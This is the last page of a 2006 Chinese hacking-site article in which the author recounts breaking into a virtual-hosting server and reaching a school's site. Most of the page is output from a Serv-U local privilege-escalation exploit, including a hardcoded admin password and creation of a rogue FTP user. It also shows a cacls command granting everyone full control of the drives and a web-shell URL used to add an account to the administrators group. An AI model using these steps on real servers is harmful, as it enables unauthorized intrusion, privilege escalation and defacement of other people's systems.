WEB开发网
开发学院网络安全黑客技术 你BT我更BT!记一次入侵BT服务器 阅读

你BT我更BT!记一次入侵BT服务器

 2006-07-04 20:33:05 来源:WEB开发网   
核心提示: 返回下面的信息,就表示成功了!!! Serv-u>3.xLocalExploitbyxiaolu<220Serv-UFTPServerv5.2forWinSockready...>USERLocalAdministrator<331Usernameokay,nee
 返回下面的信息,就表示成功了!!!

Serv-u>3.xLocalExploitbyxiaolu

<220Serv-UFTPServerv5.2forWinSockready...

>USERLocalAdministrator

<331Usernameokay,needpassword.

******************************************************

>PASS#l@$ak#.lk;0@P

<230Userloggedin,proceed.

******************************************************

>SITEMAINTENANCE

******************************************************

[+]CreatingNewDomain...

<200-DomainID=2

<220Domainsettingssaved

******************************************************

[+]Domainxl:2Created

[+]CreatingEvilUser

<200-User=xl

200Usersettingssaved

******************************************************

[+]NowExploiting...

>USERxl

<331Usernameokay,needpassword.

******************************************************

>PASS111111

<230Userloggedin,proceed.

******************************************************

[+]NowExecuting:cacls.exec:/E/T/Geveryone:F

<220Domaindeleted

******************************************************

每提交完一次都稍微等一下,因为这些命令需要时间处理的,不一会儿,就把所有分区设置为everyone完全控制了,可以任意操作硬盘的东西了,但是有些命令还是受了限制,因为权限还没有提升,现在我们把自己的用户提升为管理员: http://anyhost//cmd.pl?d:\user\bin\su.exe " net l ... s IUSR_anyhost /add"
现在我们通过web方式,执行的命令就是以administrator的身份执行的了,相信到这里,下面的事该做什么,大家应该知道了吧?马上找到那个学校的目录,进去咯~~目的达到了,本来还想做一个3389的肉鸡的,想想算了,这种BT管理员的地盘,我也占领不了多久,留点提示到他的桌面就over了。

说真的,搞安全这么久,从来没有遇见这么棘手的虚拟主机,要不是装了Perl,还真是束手无策!本文技术含量不高,只是分享一下希望其中的思路,如果有一个人从中受益,这篇文章就完成它的使命了。

上一页  1 2 3 4 5 6 

Tags:BT BT 一次

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接